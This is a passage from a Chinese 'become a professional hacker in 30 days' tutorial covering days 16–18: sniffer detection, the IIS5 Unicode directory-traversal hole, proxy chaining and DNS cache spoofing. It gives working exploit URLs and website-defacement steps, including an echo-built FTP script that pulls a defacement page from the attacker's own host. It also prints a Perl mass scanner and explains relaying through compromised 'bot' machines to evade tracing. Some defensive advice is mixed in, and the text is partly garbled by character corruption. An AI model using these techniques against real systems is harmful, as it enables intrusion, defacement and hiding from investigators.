30天打造专业红客-第7部分

快捷操作: 按键盘上方向键 ← 或 → 可快速上下翻页 按键盘上的 Enter 键可回到本书目录页 按键盘上方向键 ↑ 可回到本页顶部! 如果本书没有阅读完，想下次继续接着阅读，可使用上方 "收藏到我的浏览器" 功能 和 "加入书签" 功能！


4：利用arp数据包进行监测
这个方法和上面的差不多；它使用arp数据包替代了上述的icmp数据包而已；向局域网内的主机发送非广播方式的arp包，如果局域网内的某个主机响应了这个arp请求，那　么我们就可以判断它很可能就是处于网络监听模式了，这是目前相对而言比较好的监测模式。
（什么叫ARP？就说ARP协议；它是Address　Resolution　Protocol”（地址解析协议）的缩写；在局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址，查询目标设备的MAC地址，以保证通信的顺利进行。）
昨天有些朋友说找不到一些网络监听的工具；你在。google。搜sniffer　tools有很多的。
我就列举一些了
Windows平台下的：
Windump　http：//。xfocus。/tools/200108/238。html
相关介绍：http：//security。zz。ha。cn/windump。html
注意这个是在NT下用的98就别用了，说到这想说一局如果你的系统是98或是ME的，最好换一个，因为好多很好的软件都要求是NT的
UNIX下：
Sniffithttp：//。programsalon。/download。asp？type_id=53　　第6个
该软件的安装介绍：http：//。xfocus。/articles/200001/28。html
＇第16天＇IIS5　UNICODE　编码漏洞
unicode　漏洞是最容易让入侵者得手的一个漏洞；可以不费吹灰之力将主页改掉；重则删除
硬盘上的数据；高手甚至获取administrator　权限！
漏洞自大前年年10　月份公布至今；居然国内还有这么多的服务器存在着该漏洞
下面我从一般的入侵手法分析如何做相应的防护对策。
（一）unicode　漏洞的原理
有关漏洞的原理网上已经有很多相关的文章了；我不打算详细说；还是简单的来了解了解
好了！
实际上就是UNICODE　编码存在BUG，在UNICODE　编码中
％c1％1c　…〉（0xc1　…　0xc0）　*　0x40　＋　0x1c　=　0x5c　=　'/'
％c0％2f　…〉（0xc0　…　0xc0）　*　0x40　＋　0x2f　=　0x2f　=　''
在NT4　中/编码为％c1％9c　。在英文版里：WIN2000　英文版％c0％af
该漏洞是利用扩展UNICODE　字符取代〃/〃和〃”而能利用〃。。/〃目录遍历；故在一台有
unicode　漏洞的服务器ip　后边加上/scripts/。。％c1％1c。。/winnt/system32/cmd。exe？/c＋dir＋c：就可
以看到主机上c　盘的所有文件及目录。
（二）unicode　漏洞的危害
未经授权的用户可能利用IUSR_machinename　账号的上下文空间访问任何已知的文件。
该账号在默认情况下属于Everyone　和Users　组的成员，因此任何与Web　根目录在同一逻辑
驱动器上的能被这些用户组访问的文件都能被删除；修改或执行，就如同一个用户成功登陆
所能完成的一样。
以上部分内容摘自绿盟！
（三）unicode　漏洞的攻击手法
1、利用漏洞修改主页
这可能是新手们最兴奋的事情了！每当他们成功地黑掉一个网页后都有一股极大的满足
感。然而黑网页也是最简单的事情。
手段描述一：入侵者先用扫描工具扫到有漏洞的主机后；在IE　的地址栏里输入http：//主机
的ip/scripts/。。％c1％9c。。/winnt/system32/cmd。exe？/c＋dir＋c：就可以看到主机上c　盘的所有文件
了。要查主页放在什么地方的话；可以将后边的dir＋c：换成set　；从返回的错误信息中找到
PATH_TRANSLATED=c：ipubroot　这一句（具体的路径根据具体的情况而定）。其中的
c：ipubroot　就是主页所在的地方！接着入侵者为了避免系统对特殊字符的检测；故将
本地机器的CMD。EXE　程序复制到主机的c：ipubscripts　目录中；这样干起活来就容易多了！
他们查到主页的名字后；就可以利用echo　命令来写入信息；将内容覆盖掉主页文件就把主页
给黑了。
手段描述二：除了上面的土方法外；入侵者可以将有声有色的黑页替换主页；这样黑得不是
更爽吗？来看看他们是如何做到的。
先在本地硬盘建立个共享文件夹（如gale）；把黑页复制进去。照样把cmd。exe　拷贝到目标
的c：ipubscripts　下；名字为gale。exe，映射本地的gale　目录为目标的一个盘（如q：）
把q：里的复制到目标主机的网页目录去。覆盖对方的网页文件，最后断开映射就可以了。
这是利用本地共享目录和映射硬盘的方法替换黑页；如果黑页有背景又有音乐；文件很大；上
传费事；怎么完美一点呢？请看下边。
手段描述三：这种方法也是红客们黑美国、日本的时候最常用的手法。
入侵者先申请一个免费空间，把做好的黑页上传上去，然后利用echo　命令在目标主机
上建立一个文本文件，写上几行命令，如下：
目标主机ip/scripts/gale。exe？/c＋echo＋open＋你黑页所在的免费空间ip》文本文件名。txt
目标主机ip/gale。exe？/c＋echo＋你在黑页空间上的帐户》》文本文件名。txt
目标主机ip/gale。exe？/c＋echo＋密码》》文本文件名。txt
目标主机ip/gale。exe？/c＋echo＋get＋index。htm》》文本文件名。txt
目标主机ip/gale。exe？/c＋echo＋bye》》文本文件名。txt
目标主机ip/gale。exe？/c＋ftp＋…s：文本文件名。txt
这样入侵者就可以将黑页从另外一个空间下载到目标主机上，copy　过去覆盖就可以了。
这样入侵者不受地方的限制，随便什么地方了，比如网吧。
（四）unicode　漏洞的防护措施
说了那么多，现在该转入正题了，下面我来说说防范的措施，这也是从攻击中总结出来
的一些措施，希望对大家有帮助。
1、打上最新补丁
作为一个网络管理员，为了服务器的安全，需要不停的打上最新补丁，这是比较有效的
方法。但你要记住：在网络上；没有绝对的安全的，道高一尺；魔高一丈；完全相信防火墙和系
统补丁往往是很愚蠢的。
2、冷酷到底，拒人于千里之外
相信到现在还利用unicode　漏洞入侵的人都是些新手傻瓜们！他们没有确定的入侵目标，
只是抓个扫描器来乱扫一通，扫到就黑，扫不到就哭的那种。对付扫描器扫出未知的漏洞，
这是管理员的聪明之处。如何躲过扫描器的眼睛呢？请先看看下面一个用perl　写的扫描器代
码吧：
#！/usr/bin/perl
#Root　Shell　Hackers
#piffy
#this　is　a　quick　scanner　i　threw　together　while　supposedly　doing　homework　in　my　room。
#it　will　go　through　a　list　of　sites　and　check　if　it　gives　a　directory　listing　for　the　new　IIS　hole
#it　checks　for　both　％c0％af　and　％c1％9c　（其他版本的请修改这样的字符）
#perhaps　a　public　script　to　do　some　evil　stuff　with　this　exploit　later。。。　h0h0h0
#werd：　all　of　rsh；　0x7f；　hackweiser；　rain　forest　puppy　for　researching　the　hole　=＇
use　strict；
use　LWP：：UserAgent；
use　HTTP：：Request；
use　HTTP：：Response；
my　def　=　new　LWP：：UserAgent；
my　@host；
print　〃root　shell　hackersn〃；
print　〃iis　cmd　hole　scannern〃；
print　〃coded　by　piffyn〃；
print　〃nWhat　file　contains　the　hosts：　〃；
chop　（my　hosts=）；
open（IN；　hosts）　｜｜　die　〃nCould　not　open　hosts：　！〃；
while　（）
｛
host＇a＇　=　_；
chomp　host＇a＇；
a＋＋；
b＋＋；
｝
close（IN）；
a　=　0；
print　〃ph34r；　scan　started〃；
while　（a　《　b）
｛
my　url=〃http：//host＇a＇/scripts/。。％c0％af。。/winnt/system32/cmd。exe？/c＋dir＋c：　〃；
my　request　=　new　HTTP：：Request（'GET'；　url）；
my　response　=　def…》request（request）；
if　（response…》is_success）　｛
print　response…》content；
open（OUT；　〃》》scaniis。log〃）；
print　OUT　〃nhost＇a＇　：　response…》content〃；
…close　OUT；
｝　else　｛
print　response…》error_as_HTML；
｝
&second（）
｝
sub　second（）　｛
my　url2=〃http：//host＇a＇/scripts/。。％c1％9c。。/winnt/system32/cmd。exe？/c＋dir＋c：　〃；
my　request　=　new　HTTP：：Request（'GET'；　url2）；
my　response　=　def…》request（request）；
if　（response…》is_success）　｛
print　response…》content；
open（OUT；　〃》》scaniis。log〃）；
print　OUT　〃nhost＇a＇　：　response…》content〃；
…close　OUT；
｝　else　｛
print　response…》error_as_HTML；
｝
a＋＋；
｝
代码摘自绿盟。
不知道大家注意到上面长长的两行url　和url2　了没有，其实只是简单的字符串处理而
已。于是有以下几种方法避过扫描器的扫描：
①更改winnt　目录名
安装winnt　或者win2000　时，缺省目录是c：winnt。可以把这个目录名改成别的目录名，
这样扫描器递交〃http：//host＇a＇/scripts/。。％c1％9c。。/winnt/system32/cmd。exe？/c＋dir＋c：”类似的
url　时就会返回〃找不到该页〃的信息。这样大部分扫描器就成失灵了。（不知道小榕的流光能
不能躲得过，但大部分的用perl　写的扫描器经这样改了之后都不起作用了）。
安装前就可以这样；但是已经安装了，确实不想改winnt/2000　的目录怎么办呢？那好；可以
看看下边的：
②更改cmd。exe　和各常用命令的名称
更改cmd。exe　的名称也可以达到同样的效果，而且更加可*，假如你只更改winnt/win2000
所在的目录名的话，别人猜对后仍然可以黑掉你。同时把一些不常用的而且有危害的命令改
成只有你知道的名字；①和②结合的话更完美！
③改变web　目录位置
通常主页所在的位置是在C：IPubroot　里。在c：ipub　里有scripts　之类的目录。
如果你不需要他们的话，你可以把web　目录转移到别的分区，比如e：root　然后把C：ipub
整个删除掉。日本有一台主机就做的比较好；它的机器明明存在有unicode　漏洞；但将web　目录
转移到d　盘；并且d　盘是不可写的；有位新手在QQ　上向我抱怨说：〃老大！你说的方法不行呀；
我黑不了！呜呜呜~~〃；哈！象这样；一般的人就难以修改主页了；（注意：这只能防止一般的人；高
手只要动动脑筋；照样能黑掉！）。
④停止不必要的服务
在inter　服务器中；为了系统的安全；您必须停掉所有的缺省web　目录的服务。然后统统
删掉，只保留你所要的；以免招来后患。
⑤改变服务的端口号
在保证不影响访问率的情况下；我们可以把web　服务的端口由80　改成别的，比如108。
因为很多还是利用unicode　漏洞攻击的人一般都是新手；他们都是拿一个扫描工具扫一个ip
段的；这样做就可以躲避那种扫描一段网段的攻击者的扫描了。（注意：此方法只能防止这种方
式的扫描；别有用心的攻击者照样可以通过修改扫描器的插件来实行扫描的。但受攻击的可能
性已经减低。）
3、限制iusr_server　的权限
上面所说的措施是把攻击者拒绝于门外，如果真的很不幸，给攻击者找到门上来了，那
不是死定了？不一定！攻击者利用UNICODE　漏洞遍历目录时的用户权限是决定于
iusr_server　的权限的，而通常iusr_server　是属于guest　组的。我们只要进一步限制iusr_server
的权限还有可能挽回（对于高手们就不一定这么说了）。
建议如下：采用NTFS　格式的文件系统，将web　目录外所有的访问权限设置为：用户
iusr_server　不可访问！注意：不要给iusr_server　对web　目录有写权限！理由是什么大家都很
清楚！你的主页就是给这样的家伙给黑的，如果他没有写的权限，就象那台日本的主机一样，
一般的新手们就难以下手了。（但是，那些确实是非写不可的地方，如：聊天室或论坛，是
可以适当放开的）。
4、偷吃成功，寻找蛛丝马迹
这就是分析访问日志，一名合格的管理员，应该有经常查看日志的好习惯。日志是非常的
多的；看起来很麻烦；但对于unicode　漏洞的攻击；只要查看分析web　服务的访问日志就可以
了。扫描器的扫描和已经攻击完了的动作都会被记录下来；要注意特别留意出现的〃cmd。exe〃
字眼。
最后；我建议：
①管理好你的admin　帐户和密码
因为现在的黑客新手们虽然是冲着unicode　漏洞而来；但他们的师父们往往推荐他们用小
榕的流光；这是一个强大的漏洞扫描工具。在扫描的过程中；脆弱的管理员帐户和密码（如：帐
户：admin　密码：1234）很容易被猜中；给他们带来了以外的收获。无论怎么强大；流光也是*黑
客字典来暴力破解的；只要你密码复杂就可以避免猜中。长度最好超过8　位；大小写和复杂字符
同时出现；如：g&Al#e7　这样的密码就很难被猜中；当然；也许我这是废话。现在出现弱口令的机会是不多了
②经常更改管理员的密码
保证只有你自己一个用户出现在管理员组；经常检查有没有可疑的用户。一般的新手都是
学着别人教的招数；在管理员组里增加一个用户；留作后门。从入侵的角度来说；这是很危险的
做法；但作为管理员不可能没有发现的；（那要看管理员的素质如何了）。　
＇第17天＇跳板的故事
跳板，这里的不是指跳水的扳子（废话），我想大家多跳板都应该有个基本的认识：就是通过这个东西跳过什么东西，掩盖什么东西。就是隐藏你的足迹，想要找出你，就必须连接x个你所通过的机器，并且找出他们的log，如果碰巧有一个没有记录，线就断了：），即使都记录了，log里面登记的IP也是上一级跳板主机的IP…
当然跳板还可以用于：
。QQ或者ICQ
。　ftp客户端
。　mail客户端
。　tel客户端
。　端口扫描器
。　（以及几乎所有在网络中所使用的工具）
想想如果不要跳板我们不是很危险吗？
这可能不适用于某些IRC服务器，因为它们常常查看打开着的wingates及proxies。
先说简单的windows下的sock代理怎么做
一。找一些运行wingate的主机
原因：因为wingates的默认安装打开端口1080并且不记录socks连接。
怎么找这些机子呢？你可以用‘代理猎手’，好象中国人都用这个，国外人好象喜欢用wingatescan，或是从这里可以找到最新的：http：//。cyberarmy。/lists/wingate（国外的，我建议大家用国外的，因为追查有难度啊）
二。确认列表中的主机的确运行着wingate
三。安装一个能截取发送的信息包的软件
我使用的是一个叫purpose的工具，你可以从
http：//。buffy。nu/article。php3？id_article=3043
要设置它，只要在socks　server填上：　127。0。0。1　　port　　8000。
选择'socks　　version　　5'。再点击'resolve　　all　　names　　remotely'。
不要选'supported　authentication'。
在主界面，选择new然后建立一个你希望socks支持的程序的快捷方式
对所有你想匿名的程序做同样的工作；至于有哪些你就自己想了
四。安装socks　chainer
从http：//。ufasoft。/socks下载该工具
在service菜单；　点击new。在name段输入Chain，port则输入8000。
点击new　并且将你找到最快的wingates的IP填进去，端口则填1080。
使用　''；　　你可以添加或者移除socks。　记得一定要在使用前测试所有的socks。
五。测试你的设置
用你所建立的浏览器的快捷方式打开浏览器，连接到
http：//cavency。virtualave。/cgi…bin/env。cgi或者
http：//inter。junkbuster。/cgi…bin/show…http…headers
同样，打开你的tel客户端并尝试tel到
ftp。cztc。edu。cn
你可以通过https：//sites。inka。de：8001/cgi…bin/pyca/browser…check。py来检测SSL或者
FTP到ftp。zedz。——或者其它的FTP来验证你的IP。
在上面的测试中，远程主机上留下的将是你最后一个chain的IP地址。当然你可以在自己的
网络里进行测试……
再说说另一种吧SkSockServer“（下面称SSS）
这个与上面的利用著名的wingate做的有什么区别？
1/　普通的Sock代理程序不支持多跳板之间的连续跳，而SSS却可支持最多达255个跳板之间的连跳运动
2/　普通的Sock代理程序之间的数据传输是不加密的，而SSS支持的跳板之间传输的数据是经过动态加密的，也就是说每次传输过程中，数据加密的方式都不相同。就算你不幸在。。的过程中被webmaster发现，普通的sock代理程序将会被webmaster用sniffer把你的信息一览无遗，而恰巧你用的是SSS的话，呵呵～他将会看到一堆乱码
3/普通的sock代理程序在设置上比较烦琐，而SSS只用两步就全都ok了。（具体步骤将在下面说明）　普通的sock代理程序要不然只支持Tcp或Udp的连接，很少有二者兼顾的，而SSS却全部支持
下面是一个大哥写的教程我觉得不错，就COPY一下了
找A机上传SSS文件，（怎么找我想你应该有个肉鸡吧）如果权限足够的话，应该可以完成SSS的安装和启动。所示：　
SSS命令参数的说明：
…install　在NT机上安装SSS　
…remove　移除SSS。　
…debug　呵呵～snake进行debug用的，对于咱们老百姓来言无用。　
sksockserver　–install　安装sksockserver。
　start　skserver　启动skserver服务。：（注意：这可是在A机上运行的，可不是你自己的爱机）　
Ok啦～A机跳板完成，下面进行B机跳板的安装：　
打开终端服务客户端连上找到的B菜机。　
用B菜机的IE直接下载SSS~~呵呵～如图2：（IP地址隐去啦～大家自己找菜机吧）
在B菜机上配置sockservercfg（因为是用vc编写的sockservercfg；所以必须有mfc的库文件，如果出现“无法定位序数XXXX于动态连接库mfc42。dll”的话，大家可以在自己的机子上找找，最终上传到B菜机的路径：X：winntsystem32）　
SSS的配置界面一：在名称处可以填上任意的程序说明，以方便糊弄网管。要注意三处画红圈处，分别为：程序在开机时自动启动（我第一次用的时候还以为是给SSS自动分配端口～哎～Snake！So　lazy！～）、安装服务、启动服务。
SSS的配置界面二：是对client端进行限制的配置（呵呵～大家讲点义气，就别做限制啦）
SSS的配置界面三：重要的地方哟！在IP处填入刚才做好的A菜机的Ip地址；激活bActive处（哎～什么叫bActive呀～就不会多作一个取消的？Snake！！！Too　too　lazy！）；之后点Add。
最后提醒一句别忘了点确定哟
ok啦～大功告成！再向大家推荐最后一个好东东－SocksCap（你可以在这找到：http：//。youngzsoft。/cn/sockscap/）。在自己的机子上装好SocksCap后，设定用Sock５代理的IP地址（就是A菜机的地址）；在SocksCap下运行程序，例如：tel；ftp；ntshell；IE。。。。。所有可以上网的程序，呵呵～这样的你就从网络彻底消失啦～～
总结：
　　这篇文章只讲了两个跳板，同理，只要再设置　C；D；E。。。。。（只要你不嫌麻烦）上的配置，就连跳了n个跳板啦；在设置A机的时候其实最好也用3389登陆设置，这样的话可以自己设定SSS的端口。　
『第18天』几个DNS问题和网络攻击与防范
现在的Inter上存在的DNS服务器有绝大多数都是用bind来架设的；使用的bind版本主要为bind　4。9。5＋P1以前版本和bind　8。2。2…P5以前版本。这些bind有个共同的特点；就是BIND会缓存（Cache）所有已经查询过的结果；这个问题就引起了下面的几个问题的存在。（什么叫BIND？BIND是一款由ISC维护的Inter域名名字系统实现。）
1》。DNS欺骗
在DNS的缓存还没有过期之前；如果在DNS的缓存中已经存在的记录；一旦有客户查询；DNS服务器将会直接返回缓存中的记录。
下面我们来看一个例子：
一台运行着unix的Inter主机；并且提供rlogin服务；它的IP地址为123。45。67。89；它使用的DNS服务器（即/etc/resolv。conf中指向的DNS服务器）的IP地址为98。76。54。32；某个客户端（IP地址为38。222。74。2）试图连接到unix主机的rlogin端口；假设unix主机的/etc/hosts。equiv文件中使用的是dns名称来允许目标主机的访问；那么unix主机会向IP为98。76。54。32的DNS服务器发出一个PTR记录的查询：
123。45。67。89　…》　98。76。54。32　＇Query＇
NQY：　1　NAN：　0　NNS：　0　NAD：　0
QY：　2。74。222。38。in…addr。arpa　PTR
IP为98。76。54。32的DNS服务器中没有这个反向查询域的信息；经过一番查询；这个DNS服务器找到38。222。74。2和38。222。74。10为74。222。38。in…addr。arpa。的权威DNS服务器；所以它会向38。222。74。2发出PTR查询：
98。76。54。32　…》　38。222。74。2　＇Query＇
NQY：　1　NAN：　0　NNS：　0　NAD：　0
QY：　2。74。222。38。in…addr。arpa　PTR
请注意；38。222。74。2是我们的客户端IP；也就是说这台机子是完全掌握在我们手中的。我们可以更改它的DNS记录；让它返回我们所需要的结果：
38。222。74。2　…》　98。76。54。32　＇Answer＇
NQY：　1　N